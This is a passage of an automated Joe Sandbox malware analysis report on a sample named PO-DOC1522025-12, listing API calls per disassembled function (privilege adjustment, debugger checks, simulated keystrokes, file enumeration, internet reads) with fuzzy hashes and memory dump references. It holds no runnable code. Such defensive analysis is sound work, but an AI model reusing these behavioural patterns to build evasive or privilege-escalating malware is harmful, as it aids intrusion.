                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: c884f0988db7a0d46db7c8cda0e38fb0eb7297fae232f2cf16fee31800fc3675
                                                                                    • Instruction ID: 945d7f761514dd0eccd1ec8801f8f46e7fa3e95960c1d1325b974ab6d668b50e
                                                                                    • Opcode Fuzzy Hash: c884f0988db7a0d46db7c8cda0e38fb0eb7297fae232f2cf16fee31800fc3675
                                                                                    • Instruction Fuzzy Hash: 16313934A80348AEFF35CB64CC05BFA7BA6AF56320F84421BF581965D1D3759981C7B2
                                                                                    APIs
                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 001BCE89
                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 001BCEEA
                                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 001BCEFE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                    • String ID:
                                                                                    • API String ID: 234945975-0
                                                                                    • Opcode ID: 7e30a12f91864be048dfcdec4f053da5a95948fee8d0af8d390e169f24ca2c29
                                                                                    • Instruction ID: 613448248fd67da98a0fa9c2b8ddae2ff9a7363e3a92511bc51978b7ac994e05
                                                                                    • Opcode Fuzzy Hash: 7e30a12f91864be048dfcdec4f053da5a95948fee8d0af8d390e169f24ca2c29
                                                                                    • Instruction Fuzzy Hash: B9219D71601306EBDB20DFA5C948BA77BF8EB50354F10481EE546D2151E770EE44CBE0
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,00185222), ref: 001ADBCE
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 001ADBDD
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 001ADBEE
                                                                                    • FindClose.KERNEL32(00000000), ref: 001ADBFA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2695905019-0
                                                                                    • Opcode ID: ae002422ecffec8c64097ae954572e9abd3a19118f75b27373efa784f302b656
                                                                                    • Instruction ID: 7e36bb20015d51904a3908a75ac94ac23edfad18cfab676dfb3c8092ea877029
                                                                                    • Opcode Fuzzy Hash: ae002422ecffec8c64097ae954572e9abd3a19118f75b27373efa784f302b656
                                                                                    • Instruction Fuzzy Hash: 61F0A0308129215782206B78EC0D8AA376D9F03334B904B1BF876C28E0EBB45D94C6D5
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 001B5CC1
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 001B5D17
                                                                                    • FindClose.KERNEL32(?), ref: 001B5D5F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 3541575487-0
                                                                                    • Opcode ID: a7f6eb8217b2ea7a561750669d75fcb924a147e11e7e005a59865c9f5706ea10
                                                                                    • Instruction ID: 5786744156e26b5b467a7284aed5e34e014a6a658f501432e3a1e00f24f5fd80
                                                                                    • Opcode Fuzzy Hash: a7f6eb8217b2ea7a561750669d75fcb924a147e11e7e005a59865c9f5706ea10
                                                                                    • Instruction Fuzzy Hash: 5B519974604A019FC714CF68C894A9AB7E5FF49314F148A5EE99A8B3A2CB30FD45CF91
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0017271A
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00172724
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00172731
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    • Opcode ID: c28f90e5547ad01b9c5c45a6c6d2290355540a9941381c3e590f898ed917b119
                                                                                    • Instruction ID: 65f14d8c88032bfa191fe82adb4c55660c5b10cfa77ef393bddbb5befb921bfc
                                                                                    • Opcode Fuzzy Hash: c28f90e5547ad01b9c5c45a6c6d2290355540a9941381c3e590f898ed917b119
                                                                                    • Instruction Fuzzy Hash: 5431B774911218ABCB21DF64DD8979DB7B8BF18310F5082DAE81CA7261E7309F818F45
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 001B51DA
                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 001B5238
                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 001B52A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                    • String ID:
                                                                                    • API String ID: 1682464887-0
                                                                                    • Opcode ID: fe6bcac8bb77a6fd12a7168ea9fda1c052f73df93a7b47eaf5bc82d445c73430
                                                                                    • Instruction ID: 8b9761ed8d2a404a2e9df131e8770008c49f2c292c0d3081ca397eb39efe9393
                                                                                    • Opcode Fuzzy Hash: fe6bcac8bb77a6fd12a7168ea9fda1c052f73df93a7b47eaf5bc82d445c73430
                                                                                    • Instruction Fuzzy Hash: DB314C75A01519DFDB00DF54D884FAEBBB5FF49314F048499E805AB3A2DB31E856CB90
                                                                                    APIs
                                                                                      • Part of subcall function 0015FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00160668
                                                                                      • Part of subcall function 0015FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00160685
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001A170D
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001A173A
                                                                                    • GetLastError.KERNEL32 ref: 001A174A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                    • String ID:
                                                                                    • API String ID: 577356006-0
                                                                                    • Opcode ID: e7e4a9f00e1957bc2f083b44e4b9dcc3ed7658952fe7b1adbbcfa41164e252d1
                                                                                    • Instruction ID: 0c7efa09d2386b4e6044002b97e336ee09943d6589d4f849a804450a971dd34c
                                                                                    • Opcode Fuzzy Hash: e7e4a9f00e1957bc2f083b44e4b9dcc3ed7658952fe7b1adbbcfa41164e252d1
                                                                                    • Instruction Fuzzy Hash: DA11C1B2400305BFD7189F94DC86D6BB7B9EB04714B20852EF45697641EB70BC41CA60
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001AD608
                                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 001AD645
                                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001AD650
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                    • String ID:
                                                                                    • API String ID: 33631002-0
                                                                                    • Opcode ID: aeb102ba6de4ef79fe641ec145d98cfacfa37c4674b577186dd8730ce9323df9
                                                                                    • Instruction ID: ffefc15db580afc6e3d5c1be1b9d8d7ad316ed9ac9462a3dc20681e822a381aa
                                                                                    • Opcode Fuzzy Hash: aeb102ba6de4ef79fe641ec145d98cfacfa37c4674b577186dd8730ce9323df9
                                                                                    • Instruction Fuzzy Hash: EA113C75E06228BBDB148F99AC45FAFBBBCEB45B50F108516F908E7290D6704A058BA1
                                                                                    APIs
                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 001A168C
                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001A16A1
                                                                                    • FreeSid.ADVAPI32(?), ref: 001A16B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                    • String ID:
                                                                                    • API String ID: 3429775523-0
                                                                                    • Opcode ID: 65d880585bdf11a094556d211ec86fb8d43b94949b6c43823b8a6bae734b9254
                                                                                    • Instruction ID: 74ecceacf4b9803e4b65106b4e7acee4883419c181fc15b77b789cdcd05e3f69
                                                                                    • Opcode Fuzzy Hash: 65d880585bdf11a094556d211ec86fb8d43b94949b6c43823b8a6bae734b9254
                                                                                    • Instruction Fuzzy Hash: 47F0F475952309FBDF00DFE49C89AAEBBBCFB08604F504965E501E2181E774AA44CA90
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(001728E9,?,00164CBE,001728E9,002088B8,0000000C,00164E15,001728E9,00000002,00000000,?,001728E9), ref: 00164D09
                                                                                    • TerminateProcess.KERNEL32(00000000,?,00164CBE,001728E9,002088B8,0000000C,00164E15,001728E9,00000002,00000000,?,001728E9), ref: 00164D10
                                                                                    • ExitProcess.KERNEL32 ref: 00164D22
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: c659413c85bebc965496659b0888e639e42f12162296d28bfb0d9f5f03e9bf31
                                                                                    • Instruction ID: 8eb4d42b98b506fd8f863f45cb945d3d62c296a58e97778ee5cb531dfa3a4aae
                                                                                    • Opcode Fuzzy Hash: c659413c85bebc965496659b0888e639e42f12162296d28bfb0d9f5f03e9bf31
                                                                                    • Instruction Fuzzy Hash: D0E0B631402149BBCF11AF94DD09A583B69FB61782F108415FC198B522CB35DE92DA80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: /
                                                                                    • API String ID: 0-2043925204
                                                                                    • Opcode ID: fb8fb6cc299fb2f25afe35fb47c143a57b13983a342a5ec9a030bfc2de553a91
                                                                                    • Instruction ID: ed3a48c8eeedf0dcaffc16e425551259084871958a9f441dbdd5b8ee32d0a667
                                                                                    • Opcode Fuzzy Hash: fb8fb6cc299fb2f25afe35fb47c143a57b13983a342a5ec9a030bfc2de553a91
                                                                                    • Instruction Fuzzy Hash: 3B412876500619ABCB249FB9DC49EAB77B8FB84314F10866DF909D7181E7709D81CB90
                                                                                    APIs
                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 0019D28C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: NameUser
                                                                                    • String ID: X64
                                                                                    • API String ID: 2645101109-893830106
                                                                                    • Opcode ID: 4679aca7d1abc07294e902dfdbdb84ec943f95fad2a82139104b8a946f8bdaf1
                                                                                    • Instruction ID: bc0570dbce24718aea1d5b7ed4dda982ccd64425deb66a5418ab0114c171608b
                                                                                    • Opcode Fuzzy Hash: 4679aca7d1abc07294e902dfdbdb84ec943f95fad2a82139104b8a946f8bdaf1
                                                                                    • Instruction Fuzzy Hash: 72D0C9B480211DEACF94CB90EC88DDAB37CBB04305F100552F506A2080DB3095488F10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                    • Instruction ID: d74d4d19bb408f285b5ee52a8c8f45d19c558f8887941f339f9b4dca24924b09
                                                                                    • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                    • Instruction Fuzzy Hash: 53022C72E002199BDF14CFA9C8906ADFBF1EF88314F25816AD859E7380D731AA51CBD4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Variable is not of type 'Object'.$p#!
                                                                                    • API String ID: 0-498771827
                                                                                    • Opcode ID: ac35c04d451672f7ca294451a9ffcbe41f61a361864a2287205d972760e5a9e1
                                                                                    • Instruction ID: e8dfe3b64cb414df2e8e8dae16c5a54b5d9f002467c8934f60e3e23f2fc4d33b
                                                                                    • Opcode Fuzzy Hash: ac35c04d451672f7ca294451a9ffcbe41f61a361864a2287205d972760e5a9e1
                                                                                    • Instruction Fuzzy Hash: D632B174901218DFCF54DF94C885BEDB7B5FF19304F148069E806AB2A2DB35AE49CBA0
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 001B6918
                                                                                    • FindClose.KERNEL32(00000000), ref: 001B6961
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 1d16ffce118e1468067dba131ccd6f7a345086399086b375b3089eeac4ec4858
                                                                                    • Instruction ID: d1f0710eee54dd9bc7ccf6dc3a11a898b4b9315c57577081668337eb1a06d037
                                                                                    • Opcode Fuzzy Hash: 1d16ffce118e1468067dba131ccd6f7a345086399086b375b3089eeac4ec4858
                                                                                    • Instruction Fuzzy Hash: 2D11D0316042119FC710CF29D484A16BBE1FF94328F04C699F8698F6A2C734EC45CBD0
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,001C4891,?,?,00000035,?), ref: 001B37E4
                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,001C4891,?,?,00000035,?), ref: 001B37F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFormatLastMessage
                                                                                    • String ID:
                                                                                    • API String ID: 3479602957-0
                                                                                    • Opcode ID: 09d7e91c2134af8cc24a4d8f8a07bebe194aa0faea35818476ffb5cc27c36c42
                                                                                    • Instruction ID: 181431fb81d216e60e80ac6ff1e5fc00aaae73c626c95027e9948a3d0aa10a67
                                                                                    • Opcode Fuzzy Hash: 09d7e91c2134af8cc24a4d8f8a07bebe194aa0faea35818476ffb5cc27c36c42
                                                                                    • Instruction Fuzzy Hash: 31F0E5B16062297AE72027669C4DFEB3BAEEFC4761F000265F509D2291DB609944C7F0
                                                                                    APIs
                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 001AB25D
                                                                                    • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 001AB270
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: InputSendkeybd_event
                                                                                    • String ID:
                                                                                    • API String ID: 3536248340-0
                                                                                    • Opcode ID: 3b7ce98068a06247dd9f966b8d21bc0a6e6b92df52350b43a21520c3ca3325cb
                                                                                    • Instruction ID: 4b022e199f0c81c92a41e5a4c8c94218f43922c9c7b0bb9c2e2b28fbd7e14877
                                                                                    • Opcode Fuzzy Hash: 3b7ce98068a06247dd9f966b8d21bc0a6e6b92df52350b43a21520c3ca3325cb
                                                                                    • Instruction Fuzzy Hash: F9F0177590428EABDB059FA0C806BAE7BB4FF09309F00844AF965A61A2C3799651DF94
                                                                                    APIs
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001A11FC), ref: 001A10D4
                                                                                    • CloseHandle.KERNEL32(?,?,001A11FC), ref: 001A10E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                    • String ID:
                                                                                    • API String ID: 81990902-0
                                                                                    • Opcode ID: 5b7920a7a468b866be1bff67274dde659e00ae2e74062c5add7fb69120171a93
